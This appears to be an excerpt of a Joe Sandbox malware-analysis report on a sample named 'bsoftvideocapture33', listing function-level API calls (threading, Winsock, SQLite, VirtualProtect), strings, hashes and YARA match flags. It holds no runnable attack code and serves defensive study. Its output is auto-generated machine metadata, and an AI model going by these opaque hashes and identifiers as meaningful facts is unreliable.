                                                                                                                                        • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C01BAC
                                                                                                                                        • RtlEnterCriticalSection.NTDLL ref: 02C01BBC
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 02C01BEA
                                                                                                                                        • RtlEnterCriticalSection.NTDLL ref: 02C01C13
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 02C01C56
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1633115879-0
                                                                                                                                        • Opcode ID: f6f871209490cefbb83f52e66827a1e141db5d31dcd5d4ee465fa81e3bc0a1be
                                                                                                                                        • Instruction ID: dd115f1c50948f5feb1e63a477b92c12be89895d15ad4e7b273df5ba86fdf40a
                                                                                                                                        • Opcode Fuzzy Hash: f6f871209490cefbb83f52e66827a1e141db5d31dcd5d4ee465fa81e3bc0a1be
                                                                                                                                        • Instruction Fuzzy Hash: 1B21CCB1900604DFCB14CF68C8847AAFBB5FF88724F158549E80997340DBB1EA09CBE0
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4225432645-0
                                                                                                                                        • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                                                                        • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                                                                                        • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                                                                        • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 02C1E8B0
                                                                                                                                          • Part of subcall function 02C11FBC: __FF_MSGBANNER.LIBCMT ref: 02C11FD3
                                                                                                                                          • Part of subcall function 02C11FBC: __NMSG_WRITE.LIBCMT ref: 02C11FDA
                                                                                                                                          • Part of subcall function 02C11FBC: RtlAllocateHeap.NTDLL(00880000,00000000,00000001), ref: 02C11FFF
                                                                                                                                        • _free.LIBCMT ref: 02C1E8C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1020059152-0
                                                                                                                                        • Opcode ID: 6a753e6d5189d683d9ef94b580af0cdd162b3d4e4b9b737dd91272570b5cf076
                                                                                                                                        • Instruction ID: d4cbe31e86ae371d3dc8bb7168e933db23c6c307edef274e645b732b1c172721
                                                                                                                                        • Opcode Fuzzy Hash: 6a753e6d5189d683d9ef94b580af0cdd162b3d4e4b9b737dd91272570b5cf076
                                                                                                                                        • Instruction Fuzzy Hash: FD11C632D44611ABDF743F74A80679A379AAF03370F154A25ED09D6190DF358650FAD8
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C021DA
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C021ED
                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02C02224
                                                                                                                                        • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02C02237
                                                                                                                                        • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C02261
                                                                                                                                          • Part of subcall function 02C02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C02350
                                                                                                                                          • Part of subcall function 02C02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C02360
                                                                                                                                          • Part of subcall function 02C02341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C02370
                                                                                                                                          • Part of subcall function 02C02341: GetLastError.KERNEL32 ref: 02C0237A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1856819132-0
                                                                                                                                        • Opcode ID: b81d963af3200f348a77137e6b9016b2f4044138c0af10bc50afd3ac86703f79
                                                                                                                                        • Instruction ID: dbed3dfb53fedcd86f3f4333245b650eb7e9fde9cd47138f53ca0a5cb22872e8
                                                                                                                                        • Opcode Fuzzy Hash: b81d963af3200f348a77137e6b9016b2f4044138c0af10bc50afd3ac86703f79
                                                                                                                                        • Instruction Fuzzy Hash: D2118171D00118EBCB159FE9DC487AEBBBAFF48350F004A1AEC15A22A0DB714A51DBD2
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C0229D
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C022B0
                                                                                                                                        • TlsGetValue.KERNEL32 ref: 02C022E7
                                                                                                                                        • TlsSetValue.KERNEL32(?), ref: 02C02300
                                                                                                                                        • TlsSetValue.KERNEL32(?,?,?), ref: 02C0231C
                                                                                                                                          • Part of subcall function 02C02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C02350
                                                                                                                                          • Part of subcall function 02C02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C02360
                                                                                                                                          • Part of subcall function 02C02341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C02370
                                                                                                                                          • Part of subcall function 02C02341: GetLastError.KERNEL32 ref: 02C0237A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1856819132-0
                                                                                                                                        • Opcode ID: 22385e1a4144031d9e38589cffe1df846c88a677cc3cbe759813f3c7fefc2db1
                                                                                                                                        • Instruction ID: e1150fd9871fa65c98bbba31b9cf4902fa4b991b5b47ac5865046426c5473249
                                                                                                                                        • Opcode Fuzzy Hash: 22385e1a4144031d9e38589cffe1df846c88a677cc3cbe759813f3c7fefc2db1
                                                                                                                                        • Instruction Fuzzy Hash: FF115E71D00118EBCB159FA5D8446AEBBBAFF48350F00451AEC05A3250DB714A65DFD1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02C0A16A: __EH_prolog.LIBCMT ref: 02C0A16F
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 02C0AD34
                                                                                                                                          • Part of subcall function 02C131CA: RaiseException.KERNEL32(?,?,02C0EB64,?,?,?,?,?,?,?,02C0EB64,?,02C2ECA8,?), ref: 02C1321F
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02C2FA1C,?,00000001), ref: 02C0AD4A
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C0AD5D
                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02C2FA1C,?,00000001), ref: 02C0AD6D
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C0AD7B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2725315915-0
                                                                                                                                        • Opcode ID: bb5b7580637109592e681471ac30472bbd6c7f5dc614c44c1385b741cc27e64c
                                                                                                                                        • Instruction ID: 64e17565c6263305a23426cfd07b6dfaafb44f076c78492765ea9d7a3a0c636d
                                                                                                                                        • Opcode Fuzzy Hash: bb5b7580637109592e681471ac30472bbd6c7f5dc614c44c1385b741cc27e64c
                                                                                                                                        • Instruction Fuzzy Hash: 0E0181B6A54304AFDB149AA4DCC9F8B77ACAF043A5B418514F615D71D0DFA0E8189BA0
                                                                                                                                        APIs
                                                                                                                                        • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C02432
                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C02445
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 02C02454
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C02469
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 02C02470
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 747265849-0
                                                                                                                                        • Opcode ID: 6c02304e68c1e5a8bf99282e66daaa059affba9a148f7653e6d0a0b34cf87b50
                                                                                                                                        • Instruction ID: ab46161420e18b99b478cc34ed208b52bd98c67b8c6c36257660f1ee80d5ebbc
                                                                                                                                        • Opcode Fuzzy Hash: 6c02304e68c1e5a8bf99282e66daaa059affba9a148f7653e6d0a0b34cf87b50
                                                                                                                                        • Instruction Fuzzy Hash: C2F04972690204BBD6149AA0ED8DFD7B72CFB44751F800411F701D6080DB61A628CAE5
                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 02C01ED2
                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02C01EEA
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 02C01EF9
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C01F0E
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 02C01F15
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 830998967-0
                                                                                                                                        • Opcode ID: 9bb7b47daf3d3ec5df03ab18df309fc50788534ec689280f562543d365151945
                                                                                                                                        • Instruction ID: 06b75b51e25e8e59f9dbf6c921694e4ad4d5b45df864f0c1b419eae3e40a381d
                                                                                                                                        • Opcode Fuzzy Hash: 9bb7b47daf3d3ec5df03ab18df309fc50788534ec689280f562543d365151945
                                                                                                                                        • Instruction Fuzzy Hash: 21F06772690604BFD714AFA0EC88FD7BB6CFF08791F800512F20186480CB71A568CBE0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                        • String ID: ($string or blob too big$|
                                                                                                                                        • API String ID: 632333372-2398534278
                                                                                                                                        • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                                                                        • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                                                                        • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                                                                        • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                        • Opcode ID: d140107aa820ee0d117f79c8d24b2ad09d3b406a0abd4d416ff03246a50bfcf6
                                                                                                                                        • Instruction ID: 9cb4b749bcb77fea516ce6440c3ecd9cb4bd6c5d33cbc15e113a5a873bc4a9ff
                                                                                                                                        • Opcode Fuzzy Hash: d140107aa820ee0d117f79c8d24b2ad09d3b406a0abd4d416ff03246a50bfcf6
                                                                                                                                        • Instruction Fuzzy Hash: FF4192317003159BDB3C9E6DDCC4A6AF7A9EF81654B004A2DE856D72C1CB70F909CBA5
                                                                                                                                        APIs
                                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 02C030C3
                                                                                                                                        • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02C03102
                                                                                                                                        • _memcmp.LIBCMT ref: 02C03141
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastString_memcmp
                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                        • API String ID: 1618111833-2422070025
                                                                                                                                        • Opcode ID: 58104b28ceb9305b633212f70f84b018d094292f191edc1ff47ed6eaf2012f92
                                                                                                                                        • Instruction ID: 79d5681094aacf3ec278dae967853661e231b9d74f1b915e50cf6856bfa9f634
                                                                                                                                        • Opcode Fuzzy Hash: 58104b28ceb9305b633212f70f84b018d094292f191edc1ff47ed6eaf2012f92
                                                                                                                                        • Instruction Fuzzy Hash: 2731D3729003449FDB30AF64CCC076EB7A6AF89354F1085ADE9559B2C0DB729E45CF90
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$Protect$Query
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 3618607426-2766056989
                                                                                                                                        • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                                                                        • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                                                                        • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                                                                        • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                                                                          • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                                                                        • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                                                        • String ID: d
                                                                                                                                        • API String ID: 211589378-2564639436
                                                                                                                                        • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                                                                        • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                                                                        • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                                                                        • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C01F5B
                                                                                                                                        • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02C01FC5
                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 02C01FD2
                                                                                                                                          • Part of subcall function 02C01712: __EH_prolog.LIBCMT ref: 02C01717
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                                                                        • String ID: iocp
                                                                                                                                        • API String ID: 998023749-976528080
                                                                                                                                        • Opcode ID: 8a065096b8e3fe6bd658684e68c6b443cac065e11344d0ff34380ff49c7c3636
                                                                                                                                        • Instruction ID: db779d39ed5f2141d8f6a027a4e33cb5a0c7589e616aabce16425b73f4f6994f
                                                                                                                                        • Opcode Fuzzy Hash: 8a065096b8e3fe6bd658684e68c6b443cac065e11344d0ff34380ff49c7c3636
                                                                                                                                        • Instruction Fuzzy Hash: 0B21E7B1801B549FC720DF6AC54455BFBF8FF94720B108A1FD4A683A90DBB0A604CF91
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 02C127DD
                                                                                                                                          • Part of subcall function 02C11FBC: __FF_MSGBANNER.LIBCMT ref: 02C11FD3
                                                                                                                                          • Part of subcall function 02C11FBC: __NMSG_WRITE.LIBCMT ref: 02C11FDA
                                                                                                                                          • Part of subcall function 02C11FBC: RtlAllocateHeap.NTDLL(00880000,00000000,00000001), ref: 02C11FFF
                                                                                                                                        • std::exception::exception.LIBCMT ref: 02C127FB
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 02C12810
                                                                                                                                          • Part of subcall function 02C131CA: RaiseException.KERNEL32(?,?,02C0EB64,?,?,?,?,?,?,?,02C0EB64,?,02C2ECA8,?), ref: 02C1321F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                        • String ID: bad allocation
                                                                                                                                        • API String ID: 3074076210-2104205924
                                                                                                                                        • Opcode ID: 5b2ca74e828bbd222fb4f54eafc7e7b55619edc9f71eb0614c915a728e9f87bf
                                                                                                                                        • Instruction ID: 6269974d1c4456c59dc859930b096ed4bd45e6f0cf2290292ec34839539f9976
                                                                                                                                        • Opcode Fuzzy Hash: 5b2ca74e828bbd222fb4f54eafc7e7b55619edc9f71eb0614c915a728e9f87bf
                                                                                                                                        • Instruction Fuzzy Hash: C4E0307850021EAADB01FAA4CD029AF776DAF02304F100595DC1566590EF719B54B9E2
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C037B6
                                                                                                                                        • __localtime64.LIBCMT ref: 02C037C1
                                                                                                                                          • Part of subcall function 02C11610: __gmtime64_s.LIBCMT ref: 02C11623
                                                                                                                                        • std::exception::exception.LIBCMT ref: 02C037D9
                                                                                                                                          • Part of subcall function 02C114E3: std::exception::_Copy_str.LIBCMT ref: 02C114FC
                                                                                                                                          • Part of subcall function 02C0952D: __EH_prolog.LIBCMT ref: 02C09532
                                                                                                                                          • Part of subcall function 02C0952D: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C09541
                                                                                                                                          • Part of subcall function 02C0952D: __CxxThrowException@8.LIBCMT ref: 02C09560
                                                                                                                                        Strings
                                                                                                                                        • could not convert calendar time to UTC time, xrefs: 02C037CE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                                                                        • String ID: could not convert calendar time to UTC time
                                                                                                                                        • API String ID: 1963798777-2088861013
                                                                                                                                        • Opcode ID: 5b8caa0e7936a3087419675739a1699ce7fa1c5d9b1d07a9c70233d8ddcbc5eb
                                                                                                                                        • Instruction ID: 4fc60aa5bd9bcf808eac4b368444b1df8116a6428e18f0f678ae27748ef79554
                                                                                                                                        • Opcode Fuzzy Hash: 5b8caa0e7936a3087419675739a1699ce7fa1c5d9b1d07a9c70233d8ddcbc5eb
                                                                                                                                        • Instruction Fuzzy Hash: ECE06DF2D00129DACF00EFD8D9417EEB779EB01310F008999D825A3581DF3A9619EE91
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                                                                        • API String ID: 1646373207-2713375476
                                                                                                                                        • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                                                                        • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                                                                        • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                                                                        • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                                                                        APIs
